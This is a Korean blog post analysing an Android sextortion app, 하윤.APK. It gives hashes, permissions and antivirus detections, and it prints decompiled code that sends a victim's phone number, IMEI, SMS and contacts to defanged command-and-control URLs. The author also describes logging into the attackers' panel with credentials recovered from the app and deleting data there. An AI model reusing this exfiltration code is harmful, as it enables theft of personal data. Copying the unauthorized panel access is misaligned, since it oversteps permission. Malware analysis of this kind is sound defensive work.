몸캠 피싱 안드로이드 악성코드-하윤.APK 간단 분석

오늘은 몸캠을 통해서 개인정보를 탈취 하는 몸캠피싱인 하윤.APK 간단 분석을 해보겠습니다.일단 유포 방식은 다음과 같이 압축파일에 첨부해서 악성코드가 유포가 되면 해당 악성코드를 설치를 하고 실행을 하는 순간 개인정보가 털리는 방식을 가지고 있습니다.
정은.rar->하윤.apk
앱 제목은 영상 입니다.그리고 왠 젊은 여성 분 께서 바니? 로 포즈를 취하고 있는 아이콘 이고 아마도 이렇게 해서 낚기 위한 걸로 판단이 됩니다.
악성코드 해시값
MD5:75a396f1a2b017f221276a85a2f83594
SHA-1:93041375ea9556b1849bd314345cc88e63cad24c
SHA-256:bc914db2229cd5faea39a6e68c2dd421258a74f6d7652fffe785f7f07edbd85b

안드로이드 권한
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.READ_SMS"/>

악성코드 실행 화면 영상

보면 네트워크, 와피 파이, 인터넷, 휴대전화 상태 및 ID 읽기, 저장공간 읽고 쓰기, 연락처 읽기. 문자 읽기 기능이 있는 것을 확인을 할 수가 있습니다.
일단 바이러스 토털에서 진단되는 백신 업체 아니 보안 업체 명단입니다.(2020-12-22 08:36:14 UTC 기준)

안드로이드 악성코드 권한

Ad-Aware:Trojan.GenericKD.45074005
AegisLab:Trojan.AndroidOS.Agen.C!c
AhnLab-V3:Trojan/Android.SMSstealer.993516
Alibaba:TrojanSpy:Android/Vmvol.5f233cc4
Arcabit:Trojan.Generic.D2AFC655
Avast-Mobile:APK:RepSandbox [Trj]
Avira (no cloud):ANDROID/Spy.Vmvol.KD.Gen
BitDefender:Trojan.GenericKD.45074005
BitDefenderFalx:Android.Trojan.InfoStealer.VX
CAT-QuickHeal:Android.Vmvol.Aa999
Cynet:Malicious (score: 85)
Cyren:Trojan.HHKD-32
DrWeb:Android.Spy.723.origin
Emsisoft:Trojan.GenericKD.45074005 (B)
eScan:Trojan.GenericKD.45074005
ESET-NOD32:A Variant Of Android/Spy.Vmvol.I
F-Secure:Malware.ANDROID/Spy.Vmvol.KD.Gen
FireEye:Trojan.GenericKD.45074005
Fortinet:Android/Vmvol.I!tr
GData:Trojan.GenericKD.45074005
Gridinsoft:Spy.U.Keylogger.oa
Ikarus:Trojan.AndroidOS.Vmvol
K7GW:Spyware ( 0056cee01 )
Kaspersky:HEUR:Trojan-Spy.AndroidOS.Agen.vu
MAX:Malware (ai Score=60)
McAfee:Artemis!75A396F1A2B0
McAfee-GW-Edition:Artemis!Trojan
Microsoft:TrojanSpy:AndroidOS/Vmvol.A!MTB
Qihoo-360:Trojan.Android.Gen
Sophos:Andr/Xgen-AMX
Symantec:Trojan.Gen.MBT
Symantec Mobile Insight:Spyware:MobileSpy
Tencent:Dos.Trojan-spy.Agen.Aiid
Trustlook:Android.Malware.General (score:9)
ZoneAlarm by Check Point:HEUR:Trojan-Spy.AndroidOS.Agen.vu

com.open.studyvideo.g

일단 알약은 탐지가 되고 있지 않고 있습니다. 일단 자신이 스마트폰에서 사용하는 백신앱 이 알약(아마도 국내 인지도 상 알약이 많이 설치되어있을 것이라고 생각)에서는 탐지 가 되지 않아서 해당 백신 앱을 사용을 하시는 분들에게는 탐지가 안 되는 것 같은데 일단 개인적으로 알약에게 탐지가 될 수가 있도록 샘플을 제공을 했으면 일정 시간 지난 후에 업데이트가 진행이 될 것 같습니다. 그리고 개인적으로 알약을 만드는 이스트소프트 에게는 악감정을 없지만 만약 알약 백신앱을 설치하신 분들은 탐지율을 높이기 위해서 개인적으로 1년에 1~2만 원 사이 하는 백신 앱인 ESET-NOD32 제품을 유료로 구매해서 사용을 하시는 것 을 추천합니다.

com.open.studyvideo.f

개인적으로 사용을 하고 있지만 확실하게 정식 진단명으로 탐지 못하지만 A Variant Of Android/Spy.Vmvol.I 식으로 사전 탐지를 잘하고 있습니다. 개인적으로 느끼는 것은 ESET-NOD32 쪽이 이런 피싱 앱이나 보이스피싱앱들은 확실히 잘 탐지하고 있는 것을 느꼈습니다. 여기서 Eset 한테 돈 먹은 것 아니냐고 할 것인데 개인적으로 매년 구글 플레이 스토어에서 정식적으로 결제해서 사용을 하고 있습니다. 혹시나 해서 구글 스토어 영수증 첨부합니다. 아무튼 다시 돌아와서 해당 안드로이드 가 작동을 하는 방식은 다음과 같습니다

구글 스토어 구매 영수증

먼저 com.open.studyvideo.f 권한에 보면 사이트 주소가 있고 해당 사이트에 접속을 하면 피해를 당한 폰들이 보이는 것을 확인을 할 수가 있습니다.물론 친절 하게 몸캠 피싱 제작자들이 아이디,비밀번호가 적혀져 있는것을 확인을 할수가 있었고 일단 해당 피해자를 막기 위해서 그냥 등록된 전화번호 다 삭제해버렸습니다. 이렇게 해서 몸캠 피싱 사이트에 등록된 전화번호는 삭제가 되었습니다.(삭제를 한다고 했지만 지금 다시 접속을 해보니 일부 피해자분들이 발생을 한 것을 볼 수가 있었습니다.) 혹시나 해당 부분을 악용을 할 것 같아서 아이디와 비밀번호는 일부 $로 표시했습니다.
public static String a(Context paramContext) {
String str;
StringBuffer stringBuffer = new StringBuffer();
try {
HttpURLConnection httpURLConnection = (HttpURLConnection)(new URL("http://wer121301(.)allmonitorinfo.space/login.htm")).openConnection();
httpURLConnection.setRequestMethod("POST");
httpURLConnection.setConnectTimeout(3000);
httpURLConnection.setDoOutput(true);
byte[] arrayOfByte = "username=ad$$$$assword=1$$$$$".getBytes();
httpURLConnection.getOutputStream().write(arrayOfByte);
httpURLConnection.setInstanceFollowRedirects(false);
httpURLConnection.connect();
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(httpURLConnection.getInputStream(), "UTF-8"));
while (true) {
String str1 = bufferedReader.readLine();
if (str1 != null) {
stringBuffer.append(str1);
stringBuffer.append("\r\n");
continue;
}

몸캠 피싱으로 개인정보 수집된 화면

그리고 또 다른 부분에서 다음과 같은 동작을 하는 것을 볼 수가 있습니다.
com.open.studyvideo.g 권한은 다음과 같습니다. 여기서 보면 put() 명령어를 사용해서 키(Key)와 값으로 구성된 새로운 데이터를 추가하는 것을 볼 수가 있습니다.
public class g extends a {
protected String b() {
return "http://aas121701(.)xxyymonitor.space/sychonizeUser.htm";
}
public boolean c() {
HashMap<Object, Object> hashMap = new HashMap<Object, Object>();
String str = e.b(this.a);
try {
hashMap.put("phone", this.d);
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.append(str);
stringBuilder.append("#");
stringBuilder.append(e.a());
hashMap.put("imei", stringBuilder.toString());
hashMap.put("model", e.a());
Result result = (Result)this.c.a(b(), hashMap, Result.class);
} catch (Exception exception) {
exception.printStackTrace();
exception = null;
}

개인정보 스마트폰 문자 수집된 화면

if (exception != null && exception.isSuccess()) {
User user = exception.getUser();
if (user != null) {
c.a(this.a, user);
if (TextUtils.isEmpty(str))
c.b(this.a, user.getNewImei());
return true;
}
}

개인정보 스마트폰 문자 수집된 화면 1

그리고 스마트폰 IMEI 등 정보를 얻기 위한 코드들은 다음 카테고리에 있습니다.
com/open/studyvideo/a/e;/g;
android/support/v7/app/AppCompatDelegateImpl;
android/support/v7/app/g;
그리고 전화번호를 훔치기 위한 카테로고리는 다음과 같습니다.
com/open/studyvideo/a/e;
입니다.그리고 나서 http://aas121701(.)xxyymonitor.space/sychonizeUser.htm
로 접속을 해보았지만 해당 사이트는 정상적으로 연결 안 되었습니다.그리고 악성코드에 삽입이 되어져 있는 악성코드 주소들은 다음과 같습니다.

악성코드에 의한 연락처 정보 수집

http://aas121701(.)xxyymonitor.space/uploadSms.htm
http://aas121701(.)xxyymonitor.space/sychonizeUser.htm
http://wer121301(.)allmonitorinfo.space/login.htm
http://schemas(.)android.com/apk/res/android
http://aas121701(.)xxyymonitor.space/uploadContact.htm
http://aas121701(.)xxyymonitor.space/uploadAlbum.htm
http://aas121701(.)xxyymonitor.space/openVip.htm
일단 이런 피해를 막기 위해서는 반드시 백신앱을 설치를 하고 그리고 구글 스토어, 갤럭시 스토어, 원 스토어 등 과 같이 정상인 스토어를 통해서 앱을 설치를 하고 그리고 신뢰할 수 있는 백신앱을 사용을 하는 것도 좋은 방법일 것입니다. 물론 때로는 유료로 제공이 되는 백신 앱들도 있지만 1~2만 원 1년 가격이면 자신의 개인정보를 지키는데 투자라고 생각을 하고 구매를 하는 것이 좋은 방법일 것입니다. 개인정보 털려서 악용되어서 금전적이든 이런 피해는 막기 위해서는 돈을 투자하는 것도 좋은 방법이라고 생각을 합니다.그리고 해당 악성코드에 의해 수집된 개인정보는 접속을 통해서 저장된 전화 번호등을 삭제 조치 했습니다.다만 아직도 피해자 분들이 발생을 하고 있어서 개인적으로 한계가 있습니다.방통위에서 해당 사이트 접속을 막는 조치를 취해주시면 조금이나마 도움이 되지 않을까 생각을 합니다.